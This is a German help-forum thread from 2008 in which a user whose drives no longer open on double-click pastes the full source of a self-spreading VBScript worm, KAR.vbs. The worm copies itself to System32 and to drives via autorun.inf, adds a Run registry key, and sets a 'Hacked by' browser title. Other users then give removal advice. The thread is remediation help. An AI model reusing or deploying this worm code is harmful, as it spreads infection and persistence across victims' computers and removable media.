.vbs Datei macht mich fertig

Fu$$el · 14. November 2008

Moin,

weiß net ob ihr das kennt, aber ich hab mal ne xp cd installiert die mir komischerweise ne .vbs datei auf meine platten kopiert hat. Weiterhin ja auch net schimm, allerdings ist das schlimme, das ich das net wegbekomm und das ich meine festplatten nicht mehr öffnen kann..

Gegoogled hab ich schon, allerdings komm ich mit den Antworten nich klar..

MfG

Anzeige

r4d30nG · 14. November 2008

AW: .vbs Datei macht mich fertig

was steht denn drin in der vbs-datei? VBS-Dateien sind ja nur VisualBasic Scripte, kann man also mit Editor öffnen...
Ich vermute mal dass es ein worm / virus ist. Aber definiere mal "ich hab mal ne xp cd installiert"...
Was genau meinste damit? sind die Dateien nach nem frisch installiertem XP aufgetaucht? Original oder nicht? und bist hinterm Router oder PPPoE ?

Fu$$el · 14. November 2008

AW: .vbs Datei macht mich fertig

die vbs datei heißt halt "benutzername".vbs und kam dadurch, dass ich ne xp x64 corporate edt. installiert hab..

Hier ist auch noch nen Link zu dem Thema:

Festplatten lassen sich nicht mehr per Doppelklick öffnen - Trojaner-Board

kann leider net mehr gucken was drin steht, da ich die datein jetz gelöscht hab, allerdings bringt das auch nichts..

r4d30nG · 14. November 2008

AW: .vbs Datei macht mich fertig

versteh ich net so ganz...wenn du die gelöscht hast und die datei trotzdem noch da ist, dann müsstest die ja auch öffnen können
Oder was genau sagt Windows? Zugriff verweigert? oder Datei nicht gefunden...

Fu$$el · 14. November 2008

AW: .vbs Datei macht mich fertig

der erlaubt mir einfach nicht, die festplatten per doppelklick zu öffnen.. der sagt auch nicht, das das net geht, sondern der macht einfach nichts..

es gibt doch auch irgendwo einstellungen, das wenn man z.b. auf einen ordner doppelklickt das der dann das und das macht.. das gibt es glaubig auch für festplatten..

kann mir wer sagen, wo ich die einstellung finde und was da rein muss..

MfG

Inquisito · 14. November 2008

AW: .vbs Datei macht mich fertig

Jep,

WindowsTaste+R --> regedit --> HKEY_CLASSES_ROOT\Drive\shell\find\command
(Standard) = %SystemRoot%\Explorer.exe

das wäre die einstellung die du meinst.

Allerdings dürfte trotzallem Rechtsklick auf Pladde + Öffnen im menü funzen...

Mfg, Inqui

Fu$$el · 14. November 2008

AW: .vbs Datei macht mich fertig

Ja rechte maustaste öffnen geht, allerdings soll das nicht zu einem dauerzustand werden, weil ich da echt nen puls bekomm

in regedit ist es noch richtig eingestellt..

bin erstmal wieder paar stunden googlen :/

€dit:

Er hat sich nochmal blicken lassen:

'Mutation of Trojan virus.
'My name is KAR.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe KAR.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\KAR.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\KAR.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\KAR.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Inquisito · 14. November 2008

AW: .vbs Datei macht mich fertig

Njoa dann.
HijackThis , checken, und abschiessen die Sau.

Oder halt in liebevoller kleinstarbeit direkt im Registry Editor rausfunzeln.

theMoza · 14. November 2008

AW: .vbs Datei macht mich fertig

Naja und wenn garnix geht hilft sowas hier:

Linux.com :: Review: MitraX live CD (DL Link zur Iso is im Text)

Is ne Linux Livedistri mit SAM/Registry Editor, Brutern, Netzanalysetools uvm. zur Systemwiederherstellung. Da kannst das System offline fixen mit, ohne dass ggf. kritische Daten im Ram überleben.

Fu$$el · 15. November 2008

AW: .vbs Datei macht mich fertig

Wie fix ich das den mit hjt? Einfach system scan und dann?

Hier mal die Log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 01:00:46, on 16.11.2008
Platform: Windows 2003 SP2 (WinNT 5.02.3790)
MSIE: Internet Explorer v6.00 SP1 (6.00.3790.1830)
Boot mode: Normal

Running processes:
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files (x86)\Winamp Remote\bin\OrbTray.exe
C:\Program Files (x86)\Microsoft ActiveSync\wcescomm.exe
C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe
C:\Program Files (x86)\Ray Adams\ATI Tray Tools\atitray.exe
C:\Program Files (x86)\Hamachi\hamachi.exe
C:\Program Files (x86)\Mir4nda-IM-0.7.10-Pack-v2.1\miranda32.exe
C:\WINDOWS\SysWOW64\ctfmon.exe
C:\Program Files (x86)\Dassault Systemes\B16\intel_a\code\bin\CATSysDemon.exe
C:\Program Files (x86)\Schmads Inc\G15_TeamSpeak\G15_TeamSpeak.exe
C:\PROGRA~2\MICROS~2\rapimgr.exe
C:\Program Files (x86)\Winamp\winampa.exe
C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBService.exe
C:\WINDOWS\SysWOW64\IoctlSvc.exe
C:\WINDOWS\SysWOW64\PnkBstrA.exe
C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by KAR
F2 - REG:system.ini: UserInit=userinit
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~3\Office12\GRA8E1~1.DLL
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files (x86)\Winamp\winampa.exe"
O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
O4 - HKCU\..\Run: [Orb] "C:\Program Files (x86)\Winamp Remote\bin\OrbTray.exe" /background
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files (x86)\Microsoft ActiveSync\wcescomm.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
O4 - HKCU\..\Run: [AtiTrayTools] "C:\Program Files (x86)\Ray Adams\ATI Tray Tools\atitray.exe"
O4 - HKUS\S-1-5-19\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'Default user')
O4 - Startup: hamachi.lnk = C:\Program Files (x86)\Hamachi\hamachi.exe
O4 - Startup: Shortcut to miranda32.lnk = C:\Program Files (x86)\Mir4nda-IM-0.7.10-Pack-v2.1\miranda32.exe
O8 - Extra context menu item: Nach Microsoft E&xel exportieren - res://C:\PROGRA~2\MICROS~3\Office12\EXCEL.EXE/3000
O9 - Extra button: An OneNote senden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: An OneNote s&enden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~2\MICROS~2\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~2\MICROS~2\INetRepl.dll
O9 - Extra 'Tools' menuitem: Mobilen Favoriten erstellen... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~2\MICROS~2\INetRepl.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~2\MICROS~3\Office12\GR99D3~1.DLL
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINDOWS\system32\Ati2evxx.exe (file missing)
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2saag.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files (x86)\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Backbone Service (BBDemon) - Dassault Systemes - C:\Program Files (x86)\Dassault Systemes\B16\intel_a\code\bin\CATSysDemon.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - Unknown owner - C:\WINDOWS\System32\dmadmin.exe (file missing)
O23 - Service: Event Log (Eventlog) - Unknown owner - C:\WINDOWS\system32\services.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
O23 - Service: HTTP SSL (HTTPFilter) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: IMAPI CD-Burning COM Service (ImapiService) - Unknown owner - C:\WINDOWS\system32\imapi.exe (file missing)
O23 - Service: Distributed Transaction Coordinator (MSDTC) - Unknown owner - C:\WINDOWS\system32\msdtc.exe (file missing)
O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBService.exe
O23 - Service: Net Logon (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: NMIndexingService - Nero AG - C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe
O23 - Service: NT LM Security Support Provider (NtLmSsp) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: PLFlash DeviceIoControl Service - Prolific Technology Inc. - C:\WINDOWS\SysWOW64\IoctlSvc.exe
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\WINDOWS\system32\services.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: IPSEC Services (PolicyAgent) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Protected Storage (ProtectedStorage) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Remote Desktop Help Session Manager (RDSessMgr) - Unknown owner - C:\WINDOWS\system32\sessmgr.exe (file missing)
O23 - Service: Security Accounts Manager (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Virtual Disk Service (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: Volume Shadow Copy (VSS) - Unknown owner - C:\WINDOWS\System32\vssvc.exe (file missing)
O23 - Service: WMI Performance Adapter (WmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\wmiapsrv.exe (file missing)

--
End of file - 7006 bytes

Fu$$el · 15. November 2008

AW: .vbs Datei macht mich fertig

tut mir leid, das ich pushe, aber ich dreh hier noch ab mit dem scheiß..

kann mir den keiner sagen, wie ich das wegmach?

€dit:

Hacked by random entfernen - Anleitung hat geholfen..

~close~

(bwt sind raus..)

theMoza · 15. November 2008

AW: .vbs Datei macht mich fertig

Zieh dir ein LiveLinux mit SAM Editor, brenn das und boote von der CD/DVD
Entferne alle Flashdrives (USBstick/Cardreader mit Karten etc...) öffne die SAM Datei des WinXP und entferne diese Regkeys:

Code:

rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")

(die Keys selber heißen entsprechend "oldname" = der Rechnername von dem du das Ding hast und "newname" = dein Computername)

Anschließend lösch die VBS Dateien aus dem System32 Ordner und formatiere (kein Quickformat) deine USB Sticks etc. ein paar mal (natürlich im Linux)

... oder mach das System und die Flashspeicher platt und installier Windows neu.

Naja und pass in Zukunft auf an wessen PC du deine portablen Speicher hängst! Ich bin kein Basic/VBScript experte aber die Verbreitungsroutine ist der Witz. Wenn du nett bist kannst du ja demjenigen der dich infiziert hat noch bescheid sagen dass der das Ding draufhat. Seinen Computernamen hast du ja, siehe den 2ten Regkey!

Nützliche Suchen

.vbs Datei macht mich fertig

Videos zum Themenbereich